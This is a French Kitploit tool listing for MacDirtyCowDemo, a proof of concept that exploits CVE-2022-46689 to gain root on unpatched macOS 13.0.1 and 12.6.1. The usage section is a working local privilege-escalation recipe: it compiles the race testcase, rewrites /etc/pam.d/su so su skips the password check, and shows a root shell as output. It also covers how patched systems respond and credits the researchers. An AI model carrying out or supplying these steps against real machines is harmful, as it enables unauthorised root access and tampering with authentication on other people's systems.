Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MacDirtyCowDemo — Obtenez un accès root sur macOS 13.0.1 avec CVE-2022-46689 (équivalent macOS du bogue Dirty Cow), en utilisant le testcase extrait du code source XNU d'Apple. | Kitploit
Outils/GitHubGitHub/zhuowei/macdirtycowdemo
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingExploitation de Binaires
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

Obtenez un accès root sur macOS 13.0.1 avec CVE-2022-46689 (équivalent macOS du bogue Dirty Cow), en utilisant le testcase extrait du code source XNU d'Apple.

Voir le dépôt
410351il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Obtenez les droits root sur macOS 13.0.1 avec CVE-2022-46689 (l'équivalent macOS du bug Dirty Cow), en utilisant le cas de test extrait de la source XNU d'Apple.

https://worthdoingbadly.com/macdirtycow/

Utilisation

Sur une machine macOS 13.0.1 / 12.6.1 (ou inférieur), exécutez :

root@kitploit:~
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

Vous devriez obtenir :

root@kitploit:~
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

Testé sur macOS 13 bêta (22A5266r) avec SIP désactivé (cela devrait toujours fonctionner avec SIP activé).

Si votre système est entièrement patché (macOS 13.1 / 12.6.2), il devrait plutôt afficher :

root@kitploit:~
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

et l'exécution de su devrait toujours demander un mot de passe.

Grâce au volume système scellé, l'exécution de ceci sur un fichier du volume /System ne modifie le fichier que temporairement : il est restauré au redémarrage. L'exécuter sur un fichier d'un volume accessible en écriture conservera la modification après un redémarrage.

Crédits

  • Ian Beer de Project Zero pour avoir trouvé le problème. J'attends avec impatience votre analyse !
  • Apple pour le cas de test. (Je n'ai rien changé : j'ai juste ajouté le paramètre de ligne de commande pour contrôler quoi écraser.)
  • SSLab@Gatech pour l'astuce pour désactiver la vérification du mot de passe en utilisant /etc/pam.d.
Télécharger l’outil